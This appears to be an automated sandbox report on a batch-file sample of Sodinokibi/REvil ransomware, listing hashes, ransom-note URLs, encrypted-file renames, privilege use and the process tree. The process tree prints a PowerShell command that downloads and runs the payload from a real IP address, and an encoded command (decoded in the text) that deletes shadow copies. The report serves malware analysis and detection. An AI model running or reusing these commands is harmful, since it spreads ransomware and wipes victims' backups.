Analysis
- max time kernel: 122s
- max time network: 148s
- platform: windows7_x64
- resource: win7
- submitted: 14-08-2020 13:10
Static task: static1
Behavioral task: behavioral1
- Sample: 02e935713bd82b8d92596478da846147.bat
- Resource: win7
Behavioral task: behavioral2
- Sample: 02e935713bd82b8d92596478da846147.bat
- Resource: win10
General
- Target: 02e935713bd82b8d92596478da846147.bat
- Size: 222B
- MD5: 709373b57a3c4758065b1f72f1a19b2d
- SHA1: b820438ee7bcc43e84373b68f9fec3bedc10c25a
- SHA256: ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
- SHA512: d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f
Malware Config
- Extracted: http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147
- Extracted from C:\3o0686-readme.txt (family: sodinokibi):
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A852CC17EF37947
  - http://decryptor.cc/3A852CC17EF37947
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (61 IoCs)
  Processes: powershell.exe (PID 1072)
- Modifies extensions of user files (6 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  - File opened for modification: \??\c:\users\admin\pictures\UnprotectSwitch.tiff
  - File renamed: C:\Users\Admin\Pictures\ConvertFromStop.raw => \??\c:\users\admin\pictures\ConvertFromStop.raw.3o0686
  - File renamed: C:\Users\Admin\Pictures\InstallDisable.raw => \??\c:\users\admin\pictures\InstallDisable.raw.3o0686
  - File renamed: C:\Users\Admin\Pictures\RevokeSubmit.crw => \??\c:\users\admin\pictures\RevokeSubmit.crw.3o0686
  - File renamed: C:\Users\Admin\Pictures\SkipRemove.png => \??\c:\users\admin\pictures\SkipRemove.png.3o0686
  - File renamed: C:\Users\Admin\Pictures\UnprotectSwitch.tiff => \??\c:\users\admin\pictures\UnprotectSwitch.tiff.3o0686
- Enumerates connected drives (3 TTPs)
- Drops file in System32 directory (1 IoC)
  Processes: powershell.exe
  - File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2756p6c2gi.bmp"
- Drops file in Program Files directory (38 IoCs)
  Processes: powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe (PID 1072)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe (PID 1072, 3 events); powershell.exe (PID 1940, 2 events)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1072 powershell.exe (2 events)
  - Token: SeDebugPrivilege, PID 1940 powershell.exe
  - Token: SeBackupPrivilege, PID 1560 vssvc.exe
  - Token: SeRestorePrivilege, PID 1560 vssvc.exe
  - Token: SeAuditPrivilege, PID 1560 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1072 powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 1612 (cmd.exe) wrote to memory of PID 1072 (powershell.exe), 4 events
  - PID 1072 (powershell.exe) wrote to memory of PID 1940 (powershell.exe), 4 events
Processes
- C:\Windows\system32\cmd.exe (PID 1612)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1072)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1940)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, i.e. deletion of Volume Shadow Copies, which is what triggers the vssvc.exe activity below.)
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 1560)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken